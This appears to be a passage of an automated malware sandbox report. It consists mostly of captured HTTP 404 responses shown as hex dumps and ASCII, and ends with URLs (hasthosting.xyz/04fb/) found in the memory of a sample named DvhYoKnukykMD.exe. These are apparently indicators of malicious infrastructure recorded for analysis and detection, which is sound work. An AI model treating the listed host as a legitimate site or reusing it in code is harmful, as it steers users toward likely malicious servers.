Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:34:08 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:34:11 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:34:13 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:34:16 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1721X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:38 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:41 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:34:43 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: DvhYoKnukykMD.exe, 00000005.00000002.4110795984.00000000058F7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hasthosting.xyz
Source: DvhYoKnukykMD.exe, 00000005.00000002.4110795984.00000000058F7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hasthosting.xyz/04fb/
